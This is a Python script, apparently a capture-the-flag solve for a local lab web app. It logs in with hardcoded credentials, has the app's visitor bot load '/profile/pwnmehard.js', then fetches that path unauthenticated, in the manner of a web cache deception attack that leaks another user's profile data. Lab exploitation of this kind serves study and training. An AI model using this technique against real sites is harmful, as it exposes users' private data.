#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:1337"
USERNAME = "idapp"
PASSWORD = "1234qwer"

BASE_HEADERS = {"Content-Type": "application/json"}


def post_json(path: str, data: dict, headers: dict | None = None) -> dict:
    r = requests.post(
        BASE_URL + path, json=data, headers=headers or BASE_HEADERS, timeout=10
    )
    # helpful when the server returns non-json
    try:
        return r.json()
    except Exception:
        raise RuntimeError(f"Expected JSON from {path}, got {r.status_code}: {r.text}")


def get_text(path: str, headers: dict | None = None) -> str:
    r = requests.get(BASE_URL + path, headers=headers, timeout=10)
    return r.text


def register(username: str, password: str) -> None:
    payload = {
        "username": username,
        "password": password,
        "email": "idapp@htb.local",
    }
    r = requests.post(
        BASE_URL + "/register", json=payload, headers=BASE_HEADERS, timeout=10
    )
    # don’t assume it worked silently
    print("register:", r.status_code, r.text)


def login(username: str, password: str) -> dict:
    payload = {"username": username, "password": password}
    return post_json("/", payload)


def visit(uri: str, token: str) -> None:
    headers = {
        **BASE_HEADERS,
        "Authorization": f"Bearer {token}",
    }
    payload = {"uri": uri}
    r = requests.post(BASE_URL + "/visit", json=payload, headers=headers, timeout=10)
    print("visit:", r.status_code, r.text)


def main():
    # 1) login
    data = login(USERNAME, PASSWORD)

    # 2) if missing account, register and retry
    msg = data.get("message", "")
    if "Credentials not found" in msg:
        print("no account was found maybe you restarted the container?")
        print(f"making account with creds = {USERNAME}:{PASSWORD}")
        register(USERNAME, PASSWORD)
        data = login(USERNAME, PASSWORD)

    # 3) extract token
    token = data.get("token")
    if not token:
        raise RuntimeError(f"No token in login response: {data}")

    print("token:", token)

    auth_headers = {**BASE_HEADERS, "Authorization": f"Bearer {token}"}

    # 4) /profile
    profile = requests.get(BASE_URL + "/profile", headers=auth_headers, timeout=10)
    print("/profile:", profile.status_code)
    print(profile.text)

    # 5) /visit (IMPORTANT: leading slash + correct route)
    uri = "/profile/pwnmehard.js"
    visit(uri, token)

    # 6) fetch same resource you asked the bot to visit
    cached = requests.get(BASE_URL + uri, timeout=10)
    print(f"GET {uri}:", cached.status_code)
    print(cached.text)


if __name__ == "__main__":
    main()